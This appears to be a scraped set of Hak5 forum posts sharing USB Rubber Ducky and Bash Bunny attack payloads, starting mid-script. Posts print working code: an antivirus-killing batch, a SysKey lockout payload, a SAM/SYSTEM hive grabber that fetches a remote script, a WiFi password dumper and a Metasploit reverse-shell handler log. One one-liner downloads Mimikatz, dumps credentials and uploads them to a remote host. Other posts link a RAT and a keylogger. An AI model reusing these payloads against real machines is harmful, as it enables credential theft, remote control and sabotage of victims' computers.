/IM divx.exe /IM dllcache.exe /IM dllreg.exe /IM doors.exe Taskkill /T /F /IM dpf.exe /IM 
And to make it all come together. start.cmd @echo off cls REM Change AVKill.ps1 to AVKill.cmd if you prefer batch based files. powershell.exe -executionpolicy bypass "%~dp0\AVKill.ps1" >NUL @exit Until next time, when I get some more free time.. -Ar1k88
  2. I have a rubber ducky with the latest firmware and when trying to deploy a payload on my MS Windows 7 company PCs and laptops nothing happens. But if I press the deploy button it works. The ducky is working correctly because I am able to deploy payloads on Linux machines using the same hardware as the Windows PCs, and external PCs running Windows 7. All our computers are from Dell and we have a myriad of models (Optiplex, Latitude, etc) running Windows 7 and 10, we are using ESET Endpoint Antivirus with real time file system protection activated. I am inclined to think that the ducky is not working because some software is blocking it. Perhaps ESET? I will appreciate if anyone can comment on this issue. Thanks. met.
  3. [PAYLOAD] SysKey - Bashbunny

    I saw a Syskey Prank done on a USB via RubberDucky. So I decided to rewrite one for the Bashbunny even though it really serves no great purpose. So furthermore, after Syskey'ing myself. I don't want the dang thing anymore, so I'm releasing it. #!/bin/bash # # Title: SysKey and Reboot # Author: Ar1k88 # Version: 1.1b # Target: Windows 7-10 # # LED | Function # --------------------------------------------------------- # MAGENTA SLOW - USB Detection/Setup # YELLOW FAST/VERYFAST - Script Startup/Execute # CYAN VERYFAST - Shutting down Target Machine # GREEN BLINK/SOLID - Shutting down Bashbunny for safe removal # LED OFF - Bashbunny is Off, Safe to remove. # # Startup Delay 3 seconds. LED M SLOW ATTACKMODE HID Q DELAY 3000 # Force to Desktop LED Y FAST Q GUI d Q DELAY 250 # Open Run and Syskey Q GUI r Q DELAY 500 Q STRING syskey Q ENTER Q DELAY 500 # UAC Bypass Q ALT y # Setup Syskey - Setting Password as bashbunny LED Y VERYFAST Q DELAY 500 Q STRING u Q DELAY 250 Q STRING p Q DELAY 250 Q STRING w Q DELAY 250 Q STRING bashbunny Q TAB Q DELAY 250 Q STRING bashbunny Q DELAY 250 Q ENTER Q DELAY 500 Q ENTER # Rebooting Target Machine LED C VERYFAST Q GUI r Q DELAY 500 Q STRING CMD Q ENTER Q DELAY 500 Q STRING shutdown /r /f /t 0 Q ENTER Q DELAY 250 # Success - Starting Bashbunny Safe Shutdown LED SUCCESS sync -o Q DELAY 3000 shutdown 0 SysKey Password: bashbunny Please be responsible. ;) -Ar1k88
  4. Hi, Hak5Forums! I'm new here and would like to post some code I wrote for the USB Rubber Ducky that allows you guys to make a RAT (Remote-Administration Tool) with the Ducky. Here is the GitHub Link: https://github.com/untitledusername/duckyRAT GitHub Wiki/Tutorial Link: https://github.com/untitledusername/duckyRAT/wiki Please note, this script doesn't allow webcam access or things of that such (I'm sure you can probably get that somehow using the command line) This script only allows you to run CMD commands on the victim's PC. If you have any questions I'll gladly answer them down below. Edit: I'm working on adding features to take screenshots of victim's desktop, webcam, etc. Thanks everybody, enjoy! - untitled ❤
  5. [PAYLOAD] Clean State

    This is a simple ducky script I wrote that will clear your Google Chrome history and automatically log you off. Tested on Windows 7 (Windows 8-10 requires modification because of the start menu). This payload is useful for when run/GUI + R is blocked. DELAY 1000 CTRL + H DELAY 750 DELETE DELAY 2000 CTRL + W DELAY 750 GUI DELAY 100 TAB DELAY 100 TAB DELAY 100 ENTER You may want to increase the delays as most library computers can be slower than the average machine.
  6. [RESOLVED] encoding issue

    Hi guys, I am currently working on another payload and I want to add some control sequences in order to reduce and move my terminal window (Control sequence). I have an issue with the characters \ and [, which become a reversed exclamation mark and a {. Any idea on how to solve this issue? (I already tried to use keycodes.) Thanks
  7. Payload and unix command

    Hi there, I have a little question. I love my bash bunny and have created a lot of payloads (I will post them when really finished), but I still have some questions. Currently, for all my payloads, I open a terminal, minimize it and do my stuff. When I look at this kind of payload, on line 24 there is a Unix command "mkdir". So, is it possible to use Unix commands without a terminal? Reminder for people who read this topic, working Unix commands in payloads: mkdir source export
  8. [PAYLOAD] PasswordGrabber

    Link to github: https://github.com/hak5/bashbunny-payloads/pull/67 Comment if you would like to see some improvements or changes.
  9. So I was recently looking into NFC and how cool it is to read/write to a tag to be able to use it to control your phone, clone a card (don't do dis - illegal) and other cool stuff and I thought about making a payload that installs an app on an Android (can use HID if you wanted to..) phone then runs the app in the background. What this app does is it waits to read an NFC tag which then executes a command. The command is stored on the NFC tag itself (so you install the app on the phone and come back later with your NFC tags to do all your fancy work). Works, basically, (dare I say it..) like a 'Powershell agent'. You could make like 10 different tags that can do different things on the phone. You only have to brush the tags near the phone for the phone to execute the commands. Commands could be: - Send an SMS to yourself (phone number is stored on NFC tag so it won't be stored on the phone itself) with phone data - Call someone (prank call but..you pranked the actual call itself) - Open a webpage and download a file - Download an app from the app store - Add a contact (dunno why..) - Execute a Linux command (requires rooted Android) - Enable hotspot with specified password (you could use their data..more of an annoyance than anything else - would need rooted device to change the password) - Enable Bluetooth/WiFi - Change the volume of the device (shoot it up, make it silent..) - Make it vibrate for the next 10 minutes (That would be hilarious) - Make it start randomly ringing - Add a huge number of alarms that go off every minute/hour - Enable hotspot and start a server so that you could join it and remotely manage files/apps/settings (includes starting an ADB server...oooooooo..) Possibilities are endless... Just an idea. Installing the app from the Bash Bunny onto the device is the tricky part.
  10. Hello. I was messing around with metasploit. I'm using Armitage. Everything worked fine before. I created a new payload and the old one stopped getting a stage. It just hangs at Starting the payload handler... The new one works fine. Need help fixing it please. Here's the Armitage log: msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST PUBLIC IP LHOST => PUBLIC IP msf exploit(handler) > set LPORT 4443 LPORT => 4443 msf exploit(handler) > set Encoder x86/shikata_ga_nai Encoder => x86/shikata_ga_nai msf exploit(handler) > set EXITFUNC process EXITFUNC => process msf exploit(handler) > set ExitOnSession false ExitOnSession => false msf exploit(handler) > set Iterations 3 Iterations => 3 msf exploit(handler) > exploit -j [*] Exploit running as background job. [*] Started reverse TCP handler on PUBLIC IP:4443 [*] Starting the payload handler...
  11. SAM File Copy - Help

    Hey everyone. I have a question. I am looking at the SAM File Grabber on a live system script and I can't seem to get it to work. I plug it in and the screen just goes crazy and then it doesn't copy anything over. Here is the script I am using. REM Modifications by overwraith ESCAPE CONTROL ESCAPE DELAY 400 STRING cmd DELAY 400 ENTER DELAY 400 REM THE NEXT LINE IS WHERE CHANGING THE DIRECTORY REM TO DESIRED DIRECTORY WOULD HAVE GONE. REM CHANGE DIRECTORY 'DUCKY' FLASH DRIVE. STRING for /f "tokens=3 delims= " %A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%A:) ENTER DELAY 800 STRING cd %DUCKYdrive% DELAY 400 STRING copy con download.vbs ENTER STRING Set args = WScript.Arguments:a = split(args(0), "/")(UBound(split(args(0),"/"))) ENTER STRING Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP"):objXMLHTTP.open "GET", args(0), false:objXMLHTTP.send() ENTER STRING If objXMLHTTP.Status = 200 Then ENTER STRING Set objADOStream = CreateObject("ADODB.Stream"):objADOStream.Open ENTER STRING objADOStream.Type = 1:objADOStream.Write objXMLHTTP.ResponseBody:objADOStream.Position = 0 ENTER STRING Set objFSO = Createobject("Scripting.FileSystemObject"):If objFSO.Fileexists(a) Then objFSO.DeleteFile a ENTER STRING objADOStream.SaveToFile a:objADOStream.Close:Set objADOStream = Nothing ENTER STRING End if:Set objXMLHTTP = Nothing:Set objFSO = Nothing ENTER CTRL z ENTER STRING cscript download.vbs http://xxxxxxxxxxxxxxx/xxx/vssown.vbs ENTER DELAY 800 STRING del download.vbs ENTER DELAY 800 STRING cscript vssown.vbs /start ENTER DELAY 800 STRING cscript vssown.vbs /create ENTER DELAY 800 STRING copy \\DUCKY\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\SAM . ENTER DELAY 800 STRING copy \\DUCKY\\GLoBALROOT\Device\HarddriskVolumeShadowCopy1\windows\system32\config\SYSTEM . ENTER DELAY 800 STRING cscript vssown.vbs /stop ENTER DELAY 800 STRING del vssown.vbs ENTER STRING exit ENTER REM Make sure to change the DIRECTORY above. 
I changed STRING copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\SAM . to STRING copy \\DUCKY\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\SAM . Also the following: STRING copy \\?\\GLoBALROOT\Device\HarddriskVolumeShadowCopy1\windows\system32\config\SYSTEM . to STRING copy \\DUCKY\\GLoBALROOT\Device\HarddriskVolumeShadowCopy1\windows\system32\config\SYSTEM . Ducky is the name of the MicroSD Card so would that be correct? I changed STRING cscript download.vbs http://tools.lanmaster53.com/vssown.vbs to a vbs script provided by LanMaster53 github account. https://github.com/lanmaster53/ptscripts/blob/master/windows/vssown.vbs and changed the URL to my site hosting it. What am I missing? It doesn't seem to work or dump any files back on the Rubber Duck. I am running the Twin Duck Firmware.
  12. [PAYLOAD] WiFiCreds

    Adding this for initial pull request https://github.com/xillwillx/bashbunny-payloads/tree/master/payloads/library/WiFiCreds
  13. Information Recon Payload

    I have created an information recon payload for the USB Rubber Ducky. You can download it at http://anonsw1tchbl4d3.weebly.com/irp.html
  14. Here is my new payload to attack a Mac without using terminal. I got this idea after seeing how using good management software, an administrator can remove an app from a Mac (one such application being terminal). This eliminated a lot of the attacks I have previously made to work against a Mac. So I got to thinking and poking around inside of applications, and it turns out you can replace the contents of certain files in a Mac application and you can run scripts. You simply open the right file and replace it with your code, and then run the application. The app no longer functions normally, but by making a duplicate app in another folder and editing that one you can run your attack code without completely losing the original files and all without terminal. I used Grab.app for this but almost any app could be used, I wanted to find one that was not likely to have anything similarly named around it because of the way I selected the application to copy it. Here is the code, its outcome is to simply "say hello" (so if you test it have the volume up a bit). I have not really played with the delays yet, they are all over the place and some are too high but it makes it a bit easier to see what is going on. This is not a final project but rather a starting point to spark some new ideas. Have Fun, but please use this responsibly. DELAY 2000 COMMAND SPACE DELAY 300 STRING /Applications/Utilities/ DELAY 200 ENTER DELAY 400 STRING g DELAY 500 COMMAND c DELAY 300 COMMAND SPACE DELAY 300 STRING /Users/Shared/ DELAY 400 ENTER DELAY 400 COMMAND v DELAY 2000 COMMAND SPACE DELAY 300 STRING /Users/Shared/Grab.app/Contents/MacOS/ DELAY 600 ENTER DELAY 500 TAB DELAY 500 COMMAND o DELAY 500 COMMAND a DELAY 500 STRING #!/bin/bash DELAY 400 ENTER DELAY 300 STRING say DELAY 300 ESCAPE DELAY 300 SPACE DELAY 300 STRING hello DELAY 300 COMMAND s DELAY 400 COMMAND q DELAY 500 COMMAND SPACE DELAY 300 STRING /Users/Shared/Grab.app DELAY 400 ENTER COMMAND w COMMAND w COMMAND w
  15. WinKeylog

    Hi there, I just finished the first version of my BB keylogger. It basically launches a powershell which keylogs to the loot folder of the BB. Features: Fast launching (thanks to USB Exfil for the one line launcher) Leaves no traces when cleanup is enabled. (Insert feature?) Link: https://github.com/Vinc0682/bashbunny-payloads/tree/master/payloads/library/phishing/WinKeylogger VincBreaker PS: I will create a push request upon positive feedback and improve the payload in the other case.
  16. TLDR: https://github.com/ThoughtfulDev/PyDuckGen Hey, since the Simple-Ducky Payload Generator is discontinued I think.. I just wanted to create an easy way to generate existing payloads and move the needed files to the Rubber Ducky. PyDuck is a Python Script which helps you to get your once written USB Rubber Ducky Payloads onto your Duck's SDCard quickly. You can even change variable components by using a simple set <attribute> <val> command. All of this is made easy with a Metasploit like interface. Simply choose your payload with use <payload> configure it and there you go :) Have a look into the bundled modules in the module folder to understand the attributes but here is a quick explanation. Your duckscript is: ... STRING <replacable_text> ... In your module.json just add your attribute to the attributes tree like this: "attributes": { "replacable_text": "The default value" } If you now load your payload with 'use <your_payload>' you can now use the following: set replacable_text Hak5 is awesome :) If you then generate the inject.bin using: gen or generate the <replacable_text> will be replaced with Hak5 is awesome. Isn't that...awesome? :D You can even add folder/files to your module.json which are needed for your payload (have a look at the mimikatz_lazagne payloads to see how this works.) I really suggest that you have a look at the existing payloads to figure out how this works :D More Information can be found on the Github Repo: https://github.com/ThoughtfulDev/PyDuckGen Let me know what you think.
  17. [PAYLOAD] UnifiedRickRollWindows

    In the spirit of April Fools, I ported the original UnifiedRickRoll to Windows, so you can easily switch between Apple and Windows computers and still get the same effect. https://github.com/hak5/bashbunny-payloads/pull/139
  18. [PAYLOAD] psh_DownloadExec

    Here's a simple payload to download and execute a powershell payload locally from the BashBunny. This payload is especially useful when running larger Powershell scripts. It's much faster than waiting on HID keystrokes.
  19. I've optimized the Mr. Robot hack to run faster (regardless of web server response times, latency, etc.) and more covertly. Feel free to use the techniques with other payloads. Once the FE (white/yellow) command prompt closes you can remove the rubber ducky and the script will continue to exfiltrate creds in the background. DELAY 1000 GUI r DELAY 500 STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=18&reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs" ENTER DELAY 2000 ALT y DELAY 1000 STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "IEX(New-Object Net.WebClient).DownloadString('https://example.com/im.ps1');$o=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString('https://example.com/rx.php',$o)"&exit ENTER
  20. [PAYLOAD] UnifiedRickRoll

    In the spirit of April fools, I've thrown together a payload that will rick roll every device you plug into at a specified time. It types up a script in the terminal (which at the specified time will crank up the volume and rick roll the target), runs it, sends it to the background, and closes the terminal so that the process can sit until the trigger time. Let me know if you'd like to see this do anything more! https://github.com/hak5/bashbunny-payloads/pull/139
  21. Hey all, I rewrote the WiPassDump payload (along with every other person on the planet), but hopefully this one is the best so far. I've cut everything down to 1 file, and the actual attack takes up about 4 lines. As an added bonus I've added hak5darren's code to remove the "run" dialogue history as well. The pull request can be viewed here: https://github.com/hak5/bashbunny-payloads/pull/132 Hope you guys like it.
  22. TV-show demo payload

    Hi, I am new to this forum. Hello! Nice to meet you all! I am planning a hacking demonstration on national TV in my country and I want to show the bashbunny and what it can do on a live show. For this I need a demonstration payload which can be used to show what a hacker can do. Starting points: - assume Windows laptop with recent and updated operating system - assume the "hack" should be carried out on a computer that is on but possibly locked (with user logged in) - I have maybe 30 minutes in total, but this part should only take a maximum of three to five minutes including showing the results of the hack and explaining what it means - the audience is the general public without any detailed technical understanding Ideas: - can we make a demonstration payload that can showcase some hacks that will work most of the time? - can this be a combination of payloads that results in e.g. Copies files, passwords, backdoor? - for the hack only one or very few files need to be exfiltrated to demonstrate - not all files. - ideally the demonstration should result in the audience saying "wow, that was incredible, can that really be done"? Solution and ideas - this is where I need you guys and gals. Any ideas? /Blix
  23. [PAYLOAD] dns_spoofer

    Works like a charm if Bunny detects as 2Gb adapter (takes precedence over host's NIC) https://github.com/pojebus/bashbunny-payloads/tree/master/payloads/library/dns_spoofer
  24. CrackMapExec is a fantastic tool developed by byt3bl33d3r and can be found here: https://github.com/byt3bl33d3r/CrackMapExec As stated in the repo's README, it's powered by Impacket and takes cues and inspiration from several other tools targeting SMB, WMI, and Windows in general. I recommend reading up on it if you are unfamiliar. For now, it's worth mentioning that CrackMapExec (CME) is also a Python library that can be installed with pip and used like a standard tool, i.e. you can type "crackmapexec" and use it without needing a Python script to act as a vehicle. I installed it on the Bunny and have used it for some network based attacks using RNDIS_ETHERNET mode. If you'd like to do the same, I encourage you to install pip. Connect to the Bunny via SSH and use curl with the "insecure" and output file options, like so: cd /pentest curl -k -O https://bootstrap.pypa.io/get-pip.py Now check your Bunny's current system date and time. If it's not current then you need to update it or Python and SSL will throw a fit because the date/time is wrong. Then use Python to run the script: python get-pip.py That may take some time to complete, but pip will open up a lot of possibilities and assist with Python tools and dependencies. Once that's done, you'll need to install packages required for supporting OpenSSL/PyOpenSSL. You'll need to have shared your internet connection with the Bunny for this to work. apt-get install build-essential libssl-dev libffi-dev python-dev Once those packages have been installed successfully, you should now be able to successfully use pip to install CME. If something goes wrong with this next step, it's almost certainly related to the cryptography library and a missing dependency. Read the error carefully and Google it. You can be certain there will be several GitHub and StackOverflow hits at the top. 
Run pip: pip install crackmapexec Once that is done, you can test everything by just running "crackmapexec" in your terminal and you should see CME spit out its help text and version information. You're now ready to include CME commands in your Bunny payloads. CME is a network attack tool, so you can use it against locked PCs. A very basic example of this is: crackmapexec $TARGET_IP That command tells CME to connect to the target's IP address via SMB. If that much can be done, CME will return a hostname and the target's operating system build. This is a fast "attack" and can be used to, let's say, fingerprint a machine quickly to prove you had access and collect some information. You can go a step further with this: crackmapexec $TARGET_IP -u "" -p "" That tells CME to try a Null session with SMB. If the target disallows Null sessions nothing bad happens. You still get the basic OS details. If the target allows for a Null session to be initiated then you can check for success and then potentially proceed with something like running CME again with the addition of "--shares" to enumerate network shares and gather additional information. If you happen to have a password hash or credentials from an earlier attack (perhaps phishing or passed to you from a teammate), those creds can be used with CME and any CME-based payload can be easily edited to include the credentials for a much wider variety of attacks.
  25. Ok, so here's a payload that can grab any of the wifi info that the computer is connected to. To find the info once the payload is finished, you need to search for "Log.txt". Only works on Windows. DELAY 1000 GUI r DELAY 500 STRING cmd ENTER DELAY 1000 REM The @ will be typed as " in the Command prompt STRING cd @%USERPROFILE%\Desktop@ & for /f @tokens=2 delims=: @ %A in ('netsh wlan show interface ^| findstr @SSID@ ^| findstr /v @BSSID@') do set A=%A ENTER DELAY 100 STRING netsh wlan show profiles %A% key=clear | findstr /c:@Network type@ /c:@Authentication@ /c:@Key Content@ | findstr /v @broadcast@ | findstr /v @Radio@>>A.txt ENTER DELAY 100 STRING for /f @tokens=3 delims=: @ %A in ('findstr @Network type@ A.txt') do set B=%A ENTER DELAY 100 STRING for /f @tokens=2 delims=: @ %A in ('findstr @Authentication@ A.txt') do set C=%A ENTER DELAY 100 STRING for /f @tokens=3 delims=: @ %A in ('findstr @Key Content@ A.txt') do set D=%A ENTER DELAY 100 STRING del A.txt ENTER DELAY 100 STRING echo SSID: %A%>>Log.txt & echo Network type: %B%>>Log.txt & echo Authentication: %C%>>Log.txt & echo Password: %D%>>Log.txt ENTER Feel free to ask any questions and if there's any errors that need to be fixed on to this.